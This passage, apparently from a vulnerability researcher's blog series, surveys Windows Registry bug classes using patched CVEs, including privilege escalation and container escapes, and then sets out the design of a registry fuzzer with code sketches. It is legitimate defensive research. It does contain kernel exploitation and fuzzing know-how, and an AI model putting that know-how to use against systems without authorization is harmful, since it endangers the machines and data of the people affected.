The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past:
CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,
CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value.
Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think the chance that we will see many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, whereas here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.
Low-level information disclosure (memory, pointers)
Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation.
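Stripped of the registry specifics, the bug follows a classic pattern, sketched below with a plain malloc'ed buffer standing in for the kernel pool allocation and a caller-supplied array standing in for the user-mode destination (all names are hypothetical):

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Model of the uninitialized-tail disclosure pattern: the buffer is
   allocated with the caller-controlled size, only partially filled,
   and then copied out in full. Returns the number of leaked bytes. */
static size_t leaky_copy(char *user_out, size_t user_size,
                         const char *data, size_t data_len) {
    char *buf = malloc(user_size);        /* not zeroed, like old pool allocs */
    if (buf == NULL || data_len > user_size) {
        free(buf);
        return 0;
    }
    memcpy(buf, data, data_len);          /* only data_len bytes initialized */
    memcpy(user_out, buf, user_size);     /* BUG: copies the whole buffer,
                                             disclosing the stale tail */
    free(buf);
    return user_size - data_len;          /* bytes of leaked memory */
}
```

The fix is equally generic: either zero the allocation up front, or copy out only the initialized `data_len` bytes.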
However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files.
The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.
Broken security guarantees, API contracts and common sense assumptions
Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them.
In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.
Security access rights enforcement
The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for:
CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.
CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure.
As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.
Confused deputy problems with predefined keys
Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using the registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.
Atomicity of KTM transactions
The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work.
I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.
Containerized registry escapes
The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well-supported use cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption.
When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system.
As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post.
After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable.
[...]
Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.
Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes for a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.
Adherence to official key and value name length limits
The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits:
| Registry element | Size limit |
| --- | --- |
| Key name | 255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE. |
| Value name | 16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters. |
Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period.As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code.
Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times.
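Enforcing the documented limits at hive-load time takes only a couple of comparisons. A sketch under the assumption that, as in the regf format, name lengths are stored as 16-bit byte counts and "compressed" (ASCII) names use one byte per character; the constant and function names below are invented:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Documented limits, in characters (the code's effective limit for key
   names is 256, one more than the documented 255). */
#define MAX_KEY_NAME_CHARS    256
#define MAX_VALUE_NAME_CHARS  16383

/* Convert a regf 16-bit byte count to a character count: compressed
   names store one byte per character, UTF-16 names store two. */
static uint32_t name_chars(uint16_t name_bytes, bool compressed) {
    return compressed ? name_bytes : name_bytes / 2u;
}

/* Before October 2022, the loader admitted key names of up to 1040
   characters, and did not check value name lengths at all. */
static bool key_name_length_ok(uint16_t name_bytes, bool compressed) {
    return name_chars(name_bytes, compressed) <= MAX_KEY_NAME_CHARS;
}

static bool value_name_length_ok(uint16_t name_bytes, bool compressed) {
    return name_chars(name_bytes, compressed) <= MAX_VALUE_NAME_CHARS;
}
```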
I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash with) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.
Creation of stable keys under volatile ones
Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root and causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempt to do so results in the ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior.
During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173: the first was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.
Arbitrary key existence information leak
If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND).
After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease. It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.
Miscellaneous
In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:
Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.
Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.
Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.
Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash.
It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:
Fixing the hash in the regf header,
Performing a few simple operations on the hive, like enumerating subkeys and values,
Running on multiple machines at once,
Collecting code coverage information from the Windows kernel.
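Stripped to its essence, the mutate-and-fix-the-hash step from the list above can be sketched in Python as follows. The checksum rule (XOR of the first 127 little-endian DWORDs of the 512-byte base block, stored at offset 0x1FC) follows the publicly documented regf format; everything else here is purely illustrative:

```python
import random
import struct

def regf_checksum(data: bytes) -> int:
    # Per the public regf format documentation, the base-block checksum at
    # offset 0x1FC is the XOR of the first 127 little-endian DWORDs.
    csum = 0
    for (dword,) in struct.iter_unpack("<I", data[:0x1FC]):
        csum ^= dword
    return csum

def mutate(hive: bytes, nflips: int = 8, rng=None) -> bytes:
    rng = rng or random.Random()
    data = bytearray(hive)
    for _ in range(nflips):
        # Flip a random bit anywhere past the 4-byte "regf" signature.
        pos = rng.randrange(4, len(data))
        data[pos] ^= 1 << rng.randrange(8)
    # Re-fix the header hash so the loader doesn't reject the file outright.
    struct.pack_into("<I", data, 0x1FC, regf_checksum(bytes(data)))
    return bytes(data)
```

A real loop would then write the mutated buffer to disk and hand it to the RegLoadAppKey harness; the edge-case handling of the checksum field itself (special values in the real format) is omitted here for brevity.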
Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.
Initial corpus
The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:
All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.
The data structures within them are practically never even close to the limits imposed by the format itself, for example:
The maximum lengths of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.
The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.
The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code.
This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.
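For the from-scratch generator route, a rough Python sketch of the first half of the job – producing a logical tree that deliberately pushes the documented limits – might look like this. The dict-based tree shape is a made-up intermediate representation; the hard part, serializing such a tree into an actual regf file, is left to a hypothetical writer:

```python
import random

# Limits quoted earlier in the post.
MAX_KEY_NAME, MAX_VALUE_NAME, MAX_DEPTH = 255, 16383, 512

def random_name(rng, limit):
    # Bias toward the extremes: tiny, typical, and at (or just under) the cap.
    n = rng.choice([1, rng.randint(2, 30), limit - 1, limit])
    return "".join(rng.choice("ABCXYZ012") for _ in range(n))

def generate_tree(rng, budget, depth=0):
    """Build a logical hive as nested dicts; 'budget' (a one-element list,
    shared across the recursion) bounds the total number of keys created."""
    key = {"name": random_name(rng, MAX_KEY_NAME), "values": {}, "subkeys": []}
    for _ in range(rng.randint(0, 2)):
        data = bytes(rng.randrange(256) for _ in range(rng.randint(0, 64)))
        key["values"][random_name(rng, MAX_VALUE_NAME)] = data
    while budget[0] > 0 and depth < MAX_DEPTH and rng.random() < 0.6:
        budget[0] -= 1
        key["subkeys"].append(generate_tree(rng, budget, depth + 1))
    return key
```

Nothing here is specific to the registry yet – the value of the approach only materializes once a writer can emit the tree with controlled cell and bin layouts.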
Mutator
Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible.
For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:
Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,
Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,
Slightly change the name of a key or value, or the data in the backing cell of a value,
Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,
Change the value of some cell index, usually to an incorrect value,
Change/corrupt the binary representation of a security descriptor in some way.
This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero.
In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:
On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.
On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and their elements could be rearranged or duplicated.
On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins.This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.
On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations.
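As an illustration of the first, high-level layer, here is a hedged Python sketch that mutates a logical key tree. KEY_SYM_LINK (0x10) and REG_LINK (6) are the real registry constants; the dict-based tree encoding is a made-up stand-in for what a dedicated regf library would expose. Note how "make a symlink" is a coordinated, multi-field change that single bit flips would essentially never produce:

```python
import random

REG_LINK = 6          # value type used by registry symbolic links
KEY_SYM_LINK = 0x10   # _CM_KEY_NODE.Flags bit marking a symlink key

def make_symlink(key, target):
    # The coordinated change described above: set the flag, drop all existing
    # values, and add a single REG_LINK value named SymbolicLinkValue.
    key["flags"] = key.get("flags", 0) | KEY_SYM_LINK
    key["values"] = {"SymbolicLinkValue": (REG_LINK, target)}

def structural_mutate(root, rng):
    """Apply one high-level mutation to a random key in the logical tree."""
    nodes, stack = [], [(None, root)]
    while stack:
        parent, key = stack.pop()
        nodes.append((parent, key))
        stack.extend((key, sub) for sub in key["subkeys"])
    parent, key = rng.choice(nodes)
    op = rng.choice(["add", "duplicate", "delete", "symlink"])
    if op == "add":
        key["subkeys"].append({"name": "NewKey", "values": {}, "subkeys": []})
    elif op == "duplicate" and parent is not None:
        parent["subkeys"].append(dict(key))  # shallow copy: children aliased on purpose
    elif op == "delete" and parent is not None:
        parent["subkeys"].remove(key)
    elif op == "symlink":
        make_symlink(key, "\\Registry\\Machine\\Software")
    return root
```

The lower abstraction levels (cell-type representation, cell/bin layout, raw bits) would then apply to the serialized form of this tree.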
As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operations on that representation. One can only dream... 🙂
Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.
Harness
While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:
Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.
Support a "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.
Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.
Support the registry virtualization mechanism, which can consist of several components:
Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,
Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,
Creating an additional key structure under the HKU\<SID>_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).
Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to exercise the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.
Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.
Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce.
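The "deferred close" idea in particular can be sketched abstractly. In this hedged Python model, the backend object stands in for the real registry syscalls (all of its method names are invented for illustration), and the cache guarantees that some operations land on handles whose keys may already have been deleted or renamed:

```python
import random

class DeferredCloseCache:
    """Keep a bounded cache of key handles; close the oldest only when the
    cache is full, so later operations can hit stale handles."""
    def __init__(self, backend, limit=32):
        self.backend, self.limit, self.handles = backend, limit, []

    def open(self, path):
        h = self.backend.open_key(path)  # e.g. NtOpenKey on a real system
        self.handles.append(h)
        if len(self.handles) > self.limit:
            self.backend.close_key(self.handles.pop(0))
        return h

    def random_handle(self, rng):
        return rng.choice(self.handles)

def harness_iteration(backend, cache, rng, paths):
    # Mix fresh opens with operations on possibly-stale cached handles.
    cache.open(rng.choice(paths))
    ops = [backend.delete_key, backend.enum_subkeys, backend.query_value]
    rng.choice(ops)(cache.random_handle(rng))  # may target a deleted key
```

The interesting behavior emerges from the interleaving: because delete_key may run on one handle while another cached handle still refers to the same (now deleted) key, subsequent operations exercise the kernel's key-liveness checks.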
The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing the HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.
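The allocator-hooking option can be prototyped as a plain wrapper before committing to DTrace or kernel patching. A minimal sketch (HvAllocateCell and HCELL_NIL are the real kernel names mentioned in the post; the wrapper itself and its parameters are illustrative):

```python
import random

def with_fault_injection(alloc, failure_rate=0.01, rng=None):
    """Wrap an allocator so a given fraction of requests fail, forcing the
    code under test down its out-of-memory handling paths."""
    rng = rng or random.Random()
    def wrapped(size):
        if rng.random() < failure_rate:
            return None  # stands in for HvAllocateCell returning HCELL_NIL
        return alloc(size)
    return wrapped
```

The same pattern (intercept, fail a fraction of calls, pass the rest through) is what a kernel-side hook would implement, just with far more plumbing.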
Bug detection
Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions.
The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage – an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it.
Here are a few ideas for addressing the problem, some more realistic than others:
